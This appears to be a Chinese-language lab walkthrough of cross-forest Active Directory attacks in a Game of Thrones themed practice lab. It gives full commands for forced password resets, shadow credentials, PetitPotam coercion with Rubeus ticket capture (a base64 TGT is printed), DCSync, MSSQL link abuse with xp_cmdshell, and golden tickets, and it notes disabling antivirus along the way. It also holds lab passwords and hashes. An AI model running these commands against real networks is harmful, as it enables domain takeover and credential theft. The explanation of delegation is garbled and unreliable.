Forest Trust
Foreign group and users
•在 bloodhound看到域之间的link
MATCH p =(a:Domain)-[:Contains*1..]->(x)-->(w)-->(z)<--(y)<-[:Contains*1..]-(b:Domain)where(x:Containeror x:OU)and(y:Containeror y:OU)and(a.name <>b.name)and(tolower(w.samaccountname)<>"enterprise admins"and tolower(w.samaccountname)<>"enterprise key admins"and tolower(z.samaccountname)<>"enterprise admins"and tolower(z.samaccountname)<>"enterprise key admins") RETURN p
一些特定的group从一个域传递到另一个域。bloodhound 可以直接在界面中搜索外部的组和用户。
•由于是跨域的,首先sevenkingdoms 到 essos域 : spys 组
从small council组中选择一个幸运观众(例如 petyr.baelish:@littlefinger@)并与spys组一起利用
net rpc password jorah.mormont -U sevenkingdoms.local/petyer.baelish%@littlefinger@-S meereen.essos.local
Enternew password for jorah.mormont:<here we enter P@ssword123>
•验证
cme smb 192.168.56.12-u jorah.mormont -p 'P@ssword123'-d essos.local
•我们也可以用影子凭据
certipy shadow add -u petyer.baelish@sevenkingdoms.local-p '@littlefinger@'-dc-ip 192.168.56.12-target meereen.essos.local-account 'jorah.mormont'
certipy auth -pfx jorah.mormont.pfx -username jorah.mormont -domain essos.local-dc-ip 192.168.56.12
Use unconstrained delegation
未约束委派(unconstrained delegation)
未约束委派是Windows中的一个功能,它允许服务帐户代表用户执行操作,而不需要用户明确批准每个操作。
例如,如果用户A向服务帐户B授予未约束委派权限,则服务帐户B可以在A的上下文中自由执行操作,就像它就是用户A一样。这给予了服务帐户很大的权限。
攻击者可以利用未约束委派进行权限提升攻击。例如,攻击者可以欺骗用户向攻击者控制的服务帐户授予未约束委派权限。然后攻击者就可以用这个帐户做任何事情,就好像他们是那个用户一样。
为了缓解这个问题,微软引入了约束委派,它要求用户对服务帐户的每一次操作进行明确批准。因此,未约束委派通常不被推荐使用,除非绝对必要,因为它给予服务帐户过多的权限。
•从 kingslanding 我们可以用非约束委派来统治 essos 域•以管理员身份使用 rdp 连接到 kingslanding
xfreerdp /d:sevenkingdoms.local/u:cersei.lannister /p:'il0vejaime'/v:192.168.56.10/size:80%/cert-ignore
或者开个socks的proxy直接rdp sevenkingdoms.localcersei.lannister il0vejaime
•为了方便,反手我就关闭了defender•运行rubeus然后等待essos森林的TGT
#powershell右键以管理员身份运行 或者 手动执行
Start-Process powershell -Verb runas
.Rubeus.exe monitor /filteruser:MEEREEN$ /interval:1
•在Linux上运行 petitpotam 强制将meereen强制到kingslanding。
python3 PetitPotam.py -u arya.stark -p Needle-d north.sevenkingdoms.local kingslanding.sevenkingdoms.local meereen.essos.local
在windows上收到了相关的ticket,essos森林的TGT
doIFJDCCBSCgAwIBBaEDAgEWooIELDCCBChhggQkMIIEIKADAgEFoQ0bC0VTU09TLkxPQ0FMoiAwHqADAgECoRcwFRsGa3JidGd0GwtFU1NPUy5MT0NBTKOCA+YwggPioAMCARKhAwIBAqKCA9QEggPQk8U+BzM+CPdcgzwsJve3n7SyDHHuUHKsHdiTw9qgP9tQIQ/g2CNNKjVwMxzC0NTHORIU6UypwIetsW/Onl+FJ6ZRYAGrJfiTjnXwHXYJn6cXQVAvPfQfgtrt4w7YMH6+udhD4Np3Vf/8Diqs+JuDTsAwvn8eHTVoitJ/7DKrGGxFKk9u4DWOT0jdpOnMmkpWI0ByXB5uv9HDGXlcoXeU5Ny+escZJ3PSnyleZvEUasAzYZiUXpR1D7QmCEZ7+BOQAWZuA1fYVyEg5tJEORk0bzzi0HErFV1j6iKEKLypM+sz1bmgRrYHC6zljZ5/3CHZvJEXgGtWQEklqV+wg85q+M8BYyqNP/E8Zc9qRx7fxVeFlPzZd93llsDCXr+wFQ0hghWSSZLMriBAZHcf9CaHqH8bZeWMhyfbvTtR/t9uc9qdzKEOY4E3fwTT7zn+umSoE+FlSW6VVdxxEmbhotDvBhDw/ExGOd6uO+ozo5hb2mC+UZaHLtQgRi5K5wHaL43y88MUDVUWAExCLoAt8iKggBBhGkAwf6QS22iQQVsRqJJ/rxEzlSxk+Ppd1BRKZ5lXB/28DKfvuKqWpcTfwQfyoeGYay9sCA3jiEeer3esA6bTnowUgPaEqGDy5Kg3d08Zji7F6ix7JsemofMeTSR1fB1l1l3onwU/rPF7iEVyFFZO2XXr1TCtIyO/LN8hqS3RbSlOv74fbzrlUS137mOJX7NsHUcCHMLbRJ21dKtUlGWq8ko0CAo2PmohmRfnuhFdrWa2jQKHjJTnu86k074YGyQ0/9alYZAineE+Y9wJ/NqxUwhRiTeY4StLDs/ZCSCn7UNy9I7PGVcqBxuzTFUmQzoqtx2IN5ueE7vAxu1tfaQYQTyWBmKFvlbgbHKw75tfKRp/e1TcbGp2lrzK6iCVjMd0ePadsi7vnGJG7y2A1Alh5mr1B6BEdWJ7vW8PAU0u+vD/Z+wEJRcKXgawHW8uChRTneakbPA+/+xo2FoIbvDGt0fuwFg7ex4L/6cdUYo0t6mN+SqG7/oNDtoZ3B4es+2u/vdzw6BgRnDbzKjsplq3aXoBqQW1hEUHs/PlH9zmUTTd73Surp33GidUSvrKR4F8AQzXyM4ogsFOe4ay40JCOmVbgpVKnAP1buHQ9JhaOQgbqdneNDcMES2KvO0WNkES3RimwogaiaCRnanu7RYHmF0QpYKAbdyvFDJccMsRxtvCmvp6scGcvP5F3RyzTQFKZpIs3fXBIQlKgMj3ZmsZzBBdtaHnLboTHa4+EP5tRX/IrdH67FSNwmpxpw0u/6OB4zCB4KADAgEAooHYBIHVfYHSMIHPoIHMMIHJMIHGoCswKaADAgESoSIEIGZ/lr97Kpuu3wKoRR4Rw8JVg74yhTyu3Y7y/nSsQtiloQ0bC0VTU09TLkxPQ0FMohUwE6ADAgEBoQwwChsITUVFUkVFTiSjBwMFAGChAAClERgPMjAyMzA4MDkxNzAxNDhaphEYDzIwMjMwODEwMDMwMTQ4WqcRGA8yMDIzMDgxNjA3Mjk1MlqoDRsLRVNTT1MuTE9DQUypIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC0VTU09TLkxPQ0FM
复制到linux上,base64解码,转换成ccache 调用secretsdump进行dcsync
base64 -d rubeus.b64 > meereen.kirbi
ticketConverter.py meereen.kirbi meereen.ccache
export KRB5CCNAME=meereen.ccache
secretsdump.py -k -no-pass-just-dc-ntlm essos.local/'MEEREEN$'@meereen.essos.local
Mssql Trusted link
•MSSQL 信任链接是跨林的,所以它可以用来进行森林到森林的利用。•使用版本:mssqlclient
roxychains -q git clone https://github.com/SecureAuthCorp/impacket myimpacketmssql
cd myimpacketmssql
proxychains -q git fetch origin pull/1397/head:1397
proxychains -q git merge 1397
proxychains -q conda create -n myimpacketmssql python=3.7.9
conda activate myimpacketmssql
pip install .
•以 jon.snow 身份连接到 mssql 数据库
python3 mssqlclient.py -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@castelblack.north.sevenkingdoms.local
•枚举mssql trusted links
enum_links
直接特么没响应,估计又是哪儿出问题。。。
•使用从 castelblack(north域)到 braavos(essos 域)的链接
use_link BRAAVOS
enable_xp_cmdshell
xp_cmdshell whoami
Golden ticket with external forest, sid history ftw ( essos -> sevenkingdoms)
Find SID
lookupsid.py -domain-sids essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.120
Domain SID is: S-1-5-21-3888409149-2120389158-266936499
lookupsid.py -domain-sids sevenkingdoms.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.100
#这个认证没过去。。。换了vagrant OK了
[*]Domain SID is: S-1-5-21-3909331934-1368599321-1895990551
•像之前一样提取 krbtgt 哈希
secretsdump.py -just-dc-user 'essos/krbtgt' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
secretsdump.py -just-dc-user 'essos/krbtgt' essos.local/daenerys.targaryen:'BurnThemAll!'@192.168.56.12
由于 SID 过滤器,我们需要一个组以 RID > 1000 的 extra-sid 为目标
去BloodHood里面查一下 DRAGONRIDER,并由看到相关的RID信息
很迷惑,不是很理解。不过先拼接上收拾。
ticketer.py -nthash efcae598b59a44ecf315b457389fb7eb
-domain-sid S-1-5-21-3888409149-2120389158-266936499
-domain essos.local
-extra-sid S-1-5-21-3909331934-1368599321-1895990551-1111
dragon
export KRB5CCNAME=dragon.ccache
smbexec.py -k -no-pass dragon@kingslanding.sevenkingdoms.local-debug
果然失败了,应该是环境当中森林域设置的地方,存在问题了。
之前的后续相关的话,估计也是这个效果了。先记录着。正常的结果是直接dump到相关的hash。
Exploit acl with external trust golden ticket
•要利用来自 essos 的 acl
KINGSGUARD
S-1-5-21-3909331934-1368599321-1895990551-1110
•到目前为止,我还没有找到在 Linux 上执行此操作的好方法,但在 Windows 上很容易•以管理员身份连接到 meereen(56.12),禁用杀毒软件以使用 mimikatz 和 powerview•使用 mimikatz 与组 kingsguard (RID 1110) 匹配创建金票
essos SID
mimikatz # kerberos::golden /user:guard /domain:essos.local /sid:S-1-5-21-3888409149-2120389158-266936499 /krbtgt:cd9c4766bf492a7eaa2a107e4fc08ed4 /sids:S-1-5-21-3909331934-1368599321-1895990551-1110 /ptt
•使用powerview修改stannis的密码
PowerSploit/PowerView.ps1 at dev · PowerShellMafia/PowerSploit
Import-Module.powerview.ps1
$SecPassword =ConvertTo-SecureString'Password123!'-AsPlainText-Force
Set-DomainUserPassword-Identity stannis.baratheon -AccountPassword $SecPassword -Domain sevenkingdoms.local
•测试
cme smb 192.168.56.10-u stannis.baratheon -p Password123!-d sevenkingdoms.local
•如果我们用 klist 查看创建的tickets:•Server: krbtgt/essos.local @ essos.local (golden ticket)•Server: krbtgt/SEVENKINGDOMS.LOCAL @ ESSOS.LOCAL (kdc: meereen) (tgt inter realm)•Server: ldap/kingslanding.sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)•Server: ldap/kingslanding.sevenkingdoms.local/sevenkingdoms.local @ SEVENKINGDOMS.LOCAL (kdc: kingslanding)
原文始发于微信公众号(wulala520):Forest Trust
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论